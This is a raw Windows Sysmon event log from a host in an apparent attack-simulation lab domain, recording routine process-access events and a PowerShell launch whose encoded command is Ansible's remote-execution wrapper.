13:54:07.772{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003440Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.772{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003439Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.772{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003438Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.772{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003437Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.772{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003436Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.772{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003435Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.772{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003434Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.772{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-857F-5FCF-A700-000000009101}4716C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003433Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.772{10ACEC4A-857F-5FCF-A600-000000009101}12522460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-857F-5FCF-A700-000000009101}4716C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66722519(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65bc3123(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65bc2df4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+666746d9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b8398a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65be1e59(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65bc54be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65bc54be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65bc534f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65bb72d4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65bc3807(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65bc33fa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65bc3123(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65bc2df4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+666746d9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65ba9c55(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65ba9225(wow64) 154100x80000000000000003432Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.773{10ACEC4A-857F-5FCF-A700-000000009101}4716C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-857E-5FCF-ED48-060000000000}0x648ed0HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{10ACEC4A-857F-5FCF-A600-000000009101}1252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000003431Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.756{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003430Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.756{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003429Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.756{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003428Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.709{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-857F-5FCF-A600-000000009101}1252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003427Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.709{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-857F-5FCF-A600-000000009101}1252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003426Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.663{10ACEC4A-857F-5FCF-A600-000000009101}1252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_gmyuwgm0.lep.ps12020-12-08 13:54:07.663 10341000x80000000000000003425Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.663{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-857F-5FCF-A600-000000009101}1252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003424Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.631{10ACEC4A-857E-5FCF-9D00-000000009101}49404980C:\Windows\system32\conhost.exe{10ACEC4A-857F-5FCF-A600-000000009101}1252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003423Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.631{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003422Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.631{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003421Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.631{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003420Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 